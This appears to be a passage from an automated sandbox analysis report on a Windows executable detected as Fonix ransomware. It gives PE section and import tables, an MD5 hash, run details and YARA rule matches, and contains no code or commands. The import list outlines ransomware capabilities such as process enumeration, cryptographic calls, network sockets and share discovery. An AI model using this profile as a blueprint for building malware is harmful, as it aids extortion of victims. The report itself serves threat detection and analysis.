                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x12d0000x9dd4.pdata
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xffdd00x28.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xffca00x130.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xcbaa40xcbc00False0.472607122316data6.42152157563IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                              .rdata0xcd0000x53ac00x53c00False0.402766441231data5.43978969466IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x1210000xbd4c0x8a00False0.188632246377data4.8717114038IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                              .pdata0x12d0000x9dd40x9e00False0.48457278481data5.99554424225IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              _RDATA0x1370000x940x200False0.20703125data1.43109942357IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0x1380000x1e00x200False0.529296875data4.71229819329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1390000x2ba00x2c00False0.00301846590909data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountry
                              RT_MANIFEST0x1380600x17dXML 1.0 document textEnglishUnited States

                              Imports

                              DLLImport
                              KERNEL32.DLLSetThreadPriority, CreateMutexW, InitializeCriticalSectionEx, FindClose, LocalAlloc, ReleaseMutex, GetLocaleInfoA, OpenProcess, SetFileAttributesW, CreateToolhelp32Snapshot, Sleep, FormatMessageW, CopyFileA, GetLastError, Process32NextW, DeleteFileA, Process32FirstW, CloseHandle, RaiseException, DecodePointer, GetDriveTypeA, LocalFree, DeleteCriticalSection, CopyFileW, WideCharToMultiByte, GetConsoleWindow, GetDiskFreeSpaceExA, OpenMutexW, GetDriveTypeW, SetLastError, QueryPerformanceCounter, QueryPerformanceFrequency, GetCurrentThread, GetThreadTimes, SetEndOfFile, WriteConsoleW, CreateFileW, SetStdHandle, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, TerminateProcess, GetCurrentProcess, FindNextFileW, SetPriorityClass, FindFirstFileW, SetThreadPriorityBoost, SetProcessPriorityBoost, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindFirstFileExW, HeapSize, HeapReAlloc, ReadConsoleW, ReadFile, GetFileAttributesExW, CreateProcessW, GetExitCodeProcess, GetConsoleMode, GetConsoleCP, FlushFileBuffers, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, GetCurrentThreadId, WaitForSingleObjectEx, SwitchToThread, EncodePointer, InitializeCriticalSectionAndSpinCount, CreateEventW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, GetModuleHandleW, GetProcAddress, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, SetEvent, ResetEvent, InitializeSListHead, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, CreateTimerQueue, SignalObjectAndWait, CreateThread, GetThreadPriority, GetLogicalProcessorInformation, CreateTimerQueueTimer, ChangeTimerQueueTimer, DeleteTimerQueueTimer, GetNumaHighestNodeNumber, GetProcessAffinityMask, SetThreadAffinityMask, RegisterWaitForSingleObject, UnregisterWait, FreeLibrary, FreeLibraryAndExitThread, GetModuleFileNameW, GetModuleHandleA, LoadLibraryExW, GetVersionExW, VirtualAlloc, VirtualProtect, VirtualFree, DuplicateHandle, ReleaseSemaphore, InterlockedPopEntrySList, InterlockedPushEntrySList, InterlockedFlushSList, QueryDepthSList, UnregisterWaitEx, LoadLibraryW, WaitForSingleObject, RtlUnwindEx, RtlPcToFileHeader, ExitProcess, GetModuleHandleExW, ExitThread, MoveFileExW, GetStdHandle, WriteFile, GetCommandLineA, GetCommandLineW, GetFileSizeEx, SetFilePointerEx, GetFileType, HeapAlloc, HeapFree, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, RtlUnwind
                              ADVAPI32.dllCryptAcquireContextA, CryptGenRandom, CryptReleaseContext, GetUserNameA
                              IPHLPAPI.DLLGetIpNetTable
                              NETAPI32.dllNetShareEnum, NetApiBufferFree
                              USER32.dllGetKeyboardLayoutList, ExitWindowsEx, ShowWindow, MessageBoxW, SystemParametersInfoW
                              WININET.dllInternetCheckConnectionA
                              WS2_32.dllinet_ntoa, connect, WSAGetLastError, socket, send, WSAStartup, gethostbyname, closesocket, WSACleanup, recv, htons

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              No network behavior found

                              Code Manipulations

                              Statistics

                              System Behavior

                              General

                              Start time:18:00:05
                              Start date:11/01/2021
                              Path:C:\Users\user\Desktop\fM498uO16Z.exe
                              Wow64 process (32bit):false
                              Commandline:'C:\Users\user\Desktop\fM498uO16Z.exe'
                              Imagebase:0x1180000
                              File size:1266688 bytes
                              MD5 hash:E7F086119362368528A160BE01F194AD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000002.239974727.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Fonix, Description: Yara detected Fonix ransomware, Source: 00000000.00000000.228344878.000000000124D000.00000002.00020000.sdmp, Author: Joe Security
                              Reputation:low

                              Disassembly

                              Code Analysis

                              Reset < >